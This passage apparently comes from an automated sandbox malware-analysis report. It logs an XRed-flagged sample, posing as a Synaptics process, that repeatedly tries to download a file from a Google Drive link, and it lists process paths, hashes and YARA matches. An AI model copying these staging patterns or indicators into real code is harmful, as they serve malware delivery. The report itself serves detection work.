                                                                                                            Cookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                                                                                                            2024-11-15 10:24:54 UTC1253INHTTP/1.1 404 Not Found
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:24:54 GMT
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-uK2LjODbDS-VC5E_j4VEhg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Content-Length: 1652
                                                                                                            X-GUploader-UploadID: AFiumC4IlEjYGDmVbInMIzK4HJZnDbC0Fb9RREw5ZwQVjLrXLsMyViomF5siUQLv5farhx91eldIup9gNA
                                                                                                            Server: UploadServer
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                            Connection: close
                                                                                                            2024-11-15 10:24:54 UTC125INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68
                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width
                                                                                                            2024-11-15 10:24:54 UTC1378INData Raw: 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 54 62 64 4e 53 2d 54 4e 57 74 51 45 53 43 52 37 44 32 36 65 4c 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69
                                                                                                            Data Ascii: "><title>Error 404 (Not Found)!!1</title><style nonce="TbdNS-TNWtQESCR7D26eLA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;mi
                                                                                                            2024-11-15 10:24:54 UTC149INData Raw: 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                            Data Ascii: img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            79192.168.2.1649842142.250.185.784436056C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:24:55 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Host: docs.google.com
                                                                                                            Cache-Control: no-cache
                                                                                                            Cookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                                                                                                            2024-11-15 10:24:55 UTC1314INHTTP/1.1 303 See Other
                                                                                                            Content-Type: application/binary
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:24:55 GMT
                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-nF-uxRc6aChQIoB6LU6ohg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Server: ESF
                                                                                                            Content-Length: 0
                                                                                                            X-XSS-Protection: 0
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            80192.168.2.1649843142.250.185.784436056C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:24:55 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Host: docs.google.com
                                                                                                            Cache-Control: no-cache
                                                                                                            Cookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                                                                                                            2024-11-15 10:24:55 UTC1314INHTTP/1.1 303 See Other
                                                                                                            Content-Type: application/binary
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:24:55 GMT
                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-2rWap1zxSY1noATbe6XWQA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Server: ESF
                                                                                                            Content-Length: 0
                                                                                                            X-XSS-Protection: 0
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            81192.168.2.1649845142.250.185.654436056C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:24:55 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: drive.usercontent.google.com
                                                                                                            Connection: Keep-Alive
                                                                                                            Cookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                                                                                                            2024-11-15 10:24:55 UTC1246INHTTP/1.1 404 Not Found
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:24:55 GMT
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-4SbtQDw3nFf0L-Wy_13fXw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Content-Length: 1652
                                                                                                            X-GUploader-UploadID: AFiumC4Ccf_6fTikse9D89A8RhnGqN6OUlM5KTWwOMYUTCqGjrguEJRcS-F3hvK349AxLvyIWz4
                                                                                                            Server: UploadServer
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                            Connection: close
                                                                                                            2024-11-15 10:24:55 UTC132INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c
                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><titl
                                                                                                            2024-11-15 10:24:55 UTC1378INData Raw: 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 46 77 37 42 6b 75 73 71 34 6e 58 4d 42 65 49 77 42 66 56 6c 46 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68
                                                                                                            Data Ascii: e>Error 404 (Not Found)!!1</title><style nonce="Fw7Bkusq4nXMBeIwBfVlFA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-heigh
                                                                                                            2024-11-15 10:24:55 UTC142INData Raw: 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                            Data Ascii: pan></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            82192.168.2.1649846142.250.185.654436056C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:24:55 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: drive.usercontent.google.com
                                                                                                            Connection: Keep-Alive
                                                                                                            Cookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                                                                                                            2024-11-15 10:24:55 UTC1253INHTTP/1.1 404 Not Found
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:24:55 GMT
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-buHdELXmwnKyzgaK_4pAKw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Content-Length: 1652
                                                                                                            X-GUploader-UploadID: AHmUCY3vseVn7E1DLE9NOajKg5lH241OAT8_3y-d4aocJvF51rf5atkl7bL-2rNE5dgi7TtC02ZtxYpUww
                                                                                                            Server: UploadServer
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                            Connection: close
                                                                                                            2024-11-15 10:24:55 UTC125INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68
                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width
                                                                                                            2024-11-15 10:24:55 UTC1378INData Raw: 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 67 38 66 69 4e 52 55 74 31 52 33 6b 65 61 65 6d 34 6f 47 75 4e 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69
                                                                                                            Data Ascii: "><title>Error 404 (Not Found)!!1</title><style nonce="g8fiNRUt1R3keaem4oGuNA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;mi
                                                                                                            2024-11-15 10:24:55 UTC149INData Raw: 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                            Data Ascii: img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            83192.168.2.1649849142.250.185.784436056C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:24:56 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Host: docs.google.com
                                                                                                            Cache-Control: no-cache
                                                                                                            Cookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                                                                                                            2024-11-15 10:24:56 UTC1314INHTTP/1.1 303 See Other
                                                                                                            Content-Type: application/binary
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:24:56 GMT
                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-TrDxSzecB1YGSunBdW_0qA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Server: ESF
                                                                                                            Content-Length: 0
                                                                                                            X-XSS-Protection: 0
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            84192.168.2.1649850142.250.185.784436056C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:24:56 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Host: docs.google.com
                                                                                                            Cache-Control: no-cache
                                                                                                            Cookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                                                                                                            2024-11-15 10:24:56 UTC1314INHTTP/1.1 303 See Other
                                                                                                            Content-Type: application/binary
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:24:56 GMT
                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-gfeBdVEvANVEXC73WQzt9g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Server: ESF
                                                                                                            Content-Length: 0
                                                                                                            X-XSS-Protection: 0
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Connection: close


                                                                                                            Click to jump to process

                                                                                                            Click to jump to process

                                                                                                            Click to dive into process behavior distribution

                                                                                                            Click to jump to process

                                                                                                            Target ID:0
                                                                                                            Start time:05:23:30
                                                                                                            Start date:15/11/2024
                                                                                                            Path:C:\Users\user\Desktop\Dzsb.Qyd.Install.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\Desktop\Dzsb.Qyd.Install.exe"
                                                                                                            Imagebase:0x400000
                                                                                                            File size:941'568 bytes
                                                                                                            MD5 hash:8F6F7010F18C00958433F02D47130DD1
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:Borland Delphi
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000000.00000000.1244560230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000000.1244560230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            Target ID:2
                                                                                                            Start time:05:23:31
                                                                                                            Start date:15/11/2024
                                                                                                            Path:C:\Users\user\Desktop\._cache_Dzsb.Qyd.Install.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\Desktop\._cache_Dzsb.Qyd.Install.exe"
                                                                                                            Imagebase:0x400000
                                                                                                            File size:170'048 bytes
                                                                                                            MD5 hash:2CE4CD44B3F4B4527FF1BA1D40B3C6BC
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Antivirus matches:
                                                                                                            • Detection: 5%, ReversingLabs
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            Target ID:3
                                                                                                            Start time:05:23:31
                                                                                                            Start date:15/11/2024
